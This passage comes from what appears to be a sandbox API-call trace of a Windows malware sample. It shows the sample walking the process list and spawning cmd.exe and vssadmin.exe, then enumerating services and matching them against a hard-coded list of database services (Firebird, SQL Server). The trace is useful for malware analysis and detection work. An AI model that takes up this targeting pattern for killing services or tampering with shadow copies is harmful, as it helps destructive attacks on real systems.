[0221.040] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0221.041] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0221.041] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.042] lstrlenW (lpString="svchost.exe") returned 11 [0221.042] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.042] lstrlenW (lpString="dwm.exe") returned 7 [0221.042] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x59, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.043] lstrlenW (lpString="svchost.exe") returned 11 [0221.043] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.044] lstrlenW (lpString="svchost.exe") returned 11 [0221.044] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.045] lstrlenW (lpString="svchost.exe") returned 11 [0221.045] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.045] lstrlenW (lpString="svchost.exe") returned 11 [0221.045] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.046] lstrlenW (lpString="svchost.exe") returned 11 [0221.046] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.047] lstrlenW (lpString="svchost.exe") returned 11 [0221.047] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.048] lstrlenW (lpString="svchost.exe") returned 11 [0221.048] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.049] lstrlenW (lpString="svchost.exe") returned 11 [0221.049] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.050] lstrlenW (lpString="svchost.exe") returned 11 [0221.050] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.050] lstrlenW (lpString="spoolsv.exe") returned 11 [0221.050] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.051] lstrlenW (lpString="svchost.exe") returned 11 [0221.051] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.052] lstrlenW (lpString="svchost.exe") returned 11 [0221.052] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.053] lstrlenW (lpString="audiodg.exe") returned 11 [0221.053] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0221.053] lstrlenW (lpString="sihost.exe") returned 10 [0221.053] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.054] lstrlenW (lpString="svchost.exe") returned 11 [0221.054] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0221.055] lstrlenW (lpString="taskhostw.exe") returned 13 [0221.055] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0221.056] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0221.056] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0221.056] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0221.056] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.057] lstrlenW (lpString="explorer.exe") returned 12 [0221.057] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0221.058] lstrlenW (lpString="Memory Compression") returned 18 [0221.058] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0221.059] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0221.059] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0221.059] lstrlenW (lpString="SearchUI.exe") returned 12 [0221.059] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0221.060] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0221.060] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.061] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0221.061] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0221.062] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0221.062] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0221.062] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0221.062] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0221.063] lstrlenW (lpString="conhost.exe") returned 11 [0221.063] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0221.064] lstrlenW (lpString="roof competitive.exe") returned 20 [0221.064] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0221.067] lstrlenW (lpString="trustees.exe") returned 12 [0221.067] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0221.068] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0221.068] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0221.068] lstrlenW (lpString="isbn.exe") returned 8 [0221.068] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0221.069] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0221.069] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0221.070] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0221.070] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0221.071] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0221.071] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0221.071] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0221.072] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0221.072] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0221.072] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0221.073] lstrlenW (lpString="playstation iraq.exe") returned 20 [0221.073] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0221.074] lstrlenW (lpString="harbor.exe") returned 10 [0221.074] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0221.076] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0221.076] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0221.076] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0221.076] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0221.077] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0221.077] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0221.078] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0221.078] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0221.079] lstrlenW (lpString="larent.exe") returned 10 [0221.079] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0221.079] lstrlenW (lpString="stereo.exe") returned 10 [0221.079] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0221.081] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0221.081] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0221.081] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0221.081] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0221.082] lstrlenW (lpString="state.exe") returned 9 [0221.082] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0221.083] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0221.083] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.084] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0221.084] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0221.085] lstrlenW (lpString="taskhostw.exe") returned 13 [0221.085] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0221.086] lstrlenW (lpString="sppsvc.exe") returned 10 [0221.086] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.087] lstrlenW (lpString="svchost.exe") returned 11 [0221.087] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0221.088] lstrlenW (lpString="Pg.exe") returned 6 [0221.088] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0221.089] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0221.089] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0221.090] lstrlenW (lpString="conhost.exe") returned 11 [0221.090] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0221.091] lstrlenW (lpString="cmd.exe") returned 7 [0221.091] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0221.091] lstrlenW (lpString="conhost.exe") returned 11 [0221.091] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0221.092] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0221.093] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xef4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0221.094] lstrlenW (lpString="conhost.exe") returned 11 [0221.094] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0221.096] lstrlenW (lpString="vssadmin.exe") returned 12 [0221.096] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0221.096] CloseHandle (hObject=0x430) returned 1 [0221.097] Sleep (dwMilliseconds=0x1f4) [0221.612] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236bb70 [0221.612] EnumServicesStatusExW (in: hSCManager=0x236bb70, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0221.612] GetLastError () returned 0xea [0221.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x201e) returned 0x2372d70 [0221.612] EnumServicesStatusExW (in: hSCManager=0x236bb70, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x2372d70, cbBufSize=0x201e, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x2372d70, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0221.613] CloseServiceHandle (hSCObject=0x236bb70) returned 1 [0221.613] lstrlenW (lpString="Appinfo") returned 7 [0221.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0221.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0221.613] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0221.613] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0221.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0221.614] lstrlenW (lpString="AppXSvc") returned 7 [0221.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0221.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0221.614] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0221.614] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0221.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0221.614] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0221.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0221.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0221.614] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0221.614] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0221.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0221.614] lstrlenW 